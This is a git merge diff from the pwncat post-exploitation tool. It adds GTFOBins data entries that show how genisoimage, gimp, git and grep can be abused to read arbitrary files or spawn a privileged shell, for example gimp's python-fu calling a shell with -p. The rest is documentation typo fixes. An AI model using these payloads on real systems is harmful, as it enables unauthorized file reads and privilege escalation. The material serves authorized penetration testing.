Merge branch 'master' of github.com:calebstewart/pwncat

data/gtfobins.json

@@ -800,6 +800,64 @@
 			"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
 		}
 	],
+//-------------------------------------------------------------------
+	"genisoimage": [
+		{
+			"type": "read",
+			"stream" : "print",
+			"payload": "{command} -q -o - {lfile} | {tail} -c +49152",
+			"args": []
+		}
+	],
+//-------------------------------------------------------------------
+	"gimp": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import os; os.system(\"{shell} -p\");gimp.exit()'"],
+			"exit": "exit"
+		},
+		{
+			"type": "read",
+			"stream": "raw",
+			"payload": "{command} 2>/dev/null",
+			"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys; sys.stdout.write(open(\"{lfile}\",\"rb\").read());gimp.exit()'"]
+		}
+
+		// This 'write' technique seems to fail because it cannot capture stdin, being a "subprocess".
+		// Since it can get a shell, this is not really an issue.
+		// {
+		// 	"type": "write",
+		// 	"stream":"raw",
+		// 	"payload": "{command} 2>/dev/null",
+		// 	"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys, shutil; shutil.copyfileobj(sys.stdin.buffer, open(\"{lfile}\",\"wb\"),length={length});gimp.exit()'"]
+		// },
+		// {
+		// 	"type": "write",
+		// 	"stream":"base64",
+		// 	"payload": "{command} 2>/dev/null",
+		// 	"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'exec(\"\"\"import sys,base64\\nwith open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")\\ngimp.exit()'"]
+		// }
+	],
+//-------------------------------------------------------------------
+	"git": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"args": ["help", "config"],
+			"input": "!{shell}\n",
+			"exit": "exit\nq\n"
+		}
+	],
+//-------------------------------------------------------------------
+	"grep": [
+		{
+			"type": "read",
+			"stream":"print",
+			"payload": "{command}",
+			"args": ["''", "{lfile}"]
+		}
+	],
 
 
 

docs/source/api/index.rst

@@ -3,7 +3,7 @@ API Documentation
 
 ``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
 with the remote host. A large variety of interaction with the remote host has been abstracted to
-make interaction via python seemless. This is beneficial both for implementing simple ``pwncat``
+make interaction via Python seamless. This is beneficial both for implementing simple ``pwncat``
 prompt commands or more complicated privilege escalation or persistence methods.
 
 .. toctree::

docs/source/api/privesc.rst

@@ -9,7 +9,7 @@ the ``pwncat/privesc`` directory.
 Methods vs Techniques
 ---------------------
 
-Privelege escalation methods may implement multiple techniques. Techniques represent a single action
+Privilege escalation methods may implement multiple techniques. Techniques represent a single action
 which a specific privilege escalation method can perform. Each technique is identified by it's method,
 the user which the action can be performed as, a Capability and some method specific data.
 

docs/source/api/victim.rst

@@ -24,7 +24,7 @@ processes output. If ``delim`` is false, this is equivalent to sending the comma
 directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
 True (the default value) instructs the method to prepend and append delimeters. ``process`` will
 also wait for the starting delimeter to be sent before returning. This means that with ``delim``
-on, reading data from ``pwncat.victim.client`` after calling process with be the output of the process
+on, reading data from ``pwncat.victim.client`` after calling ``process`` will be the output of the process
 up until the end delimeter.
 
 The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
@@ -83,7 +83,7 @@ interface, uploading a local file to a remote file can be accomplished with Pyth
     import os
     import shutil
 
-    with open("loca-file", "rb") as src:
+    with open("local-file", "rb") as src:
         with pwncat.victim.open("/tmp/remote-file", "wb",
                 length=os.path.getsize("local-file")) as dst:
             shutil.copyfileobj(src, dst)
@@ -111,7 +111,7 @@ auto-start, starting, stopping and creation of remote services.
 To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
 yielding each abstracted service object. Each object contains a name, description, and state as well as
 methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
-on you having the correct permission to manage the services, however retrieve the state and list of
+on you having the correct permission to manage the services, however retrieving the state and list of
 services should work regardless of your permission level.
 
 .. code-block:: python
@@ -122,7 +122,7 @@ services should work regardless of your permission level.
         print(f"{service.name} is {'running' if service.running else 'stopped'}")
 
 To find a specific service by name, there is a ``find_service`` method which returns an individual
-remote service object. If the service is not found, a ValueError is raised.
+remote service object. If the service is not found, a ``ValueError`` is raised.
 
 .. code-block:: python
 

docs/source/configuration.rst

@@ -47,7 +47,7 @@ you can use the "--password/-p" parameter:
 
 .. code-block:: bash
 
-    set -p bob "b0b5_P@ss0rd"
+    set -p bob "b0b5_P@ssw0rd"
 
 Key Bindings
 ------------

docs/source/index.rst

@@ -13,7 +13,7 @@ available on the target system. It will then attempt to start a pseudoterminal
 on the remote host and provide you with raw terminal access.
 
 pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
-programatically interact with the remote host alongside your terminal access.
+programmatically interact with the remote host alongside your terminal access.
 pwncat provides you with a local shell interface which can utilize your
 connection for enumeration, file upload/download, automatic persistence
 installation and even automated privilege escalation.
@@ -39,7 +39,7 @@ reverse shells. It normally goes something like this:
     # You now have a full terminal that doesn't exit on C-c
     remote$
 
-This works well. However, the added steps to get a reverse shell are laberous
+This works well. However, the added steps to get a reverse shell are laborious
 after a while. Also, the danger of losing your remote shell by accidentally
 pressing "C-c" prior to gaining raw access is high. This was the original
 inspiration of this project.

docs/source/installation.rst

@@ -5,7 +5,7 @@ Installation
     :maxdepth: -1
 
 The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
-you will likely need your distributions Python Development package (``python3-dev`` for debian-based distributions).
+you will likely need your distributions Python Development package (``python3-dev`` for Debian-based distributions).
 Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:
 
 .. code-block:: bash

pwncat/remote/victim.py

@@ -502,7 +502,7 @@ class Victim:
         :return: The full path to the requested binary or None if it was not found.
         """
 
-        if self.has_busybox:
+        if self.host.busybox is not None:
             if name in self.busybox_provides:
                 if quote:
                     return f"{shlex.quote(str(self.busybox_path))} {name}"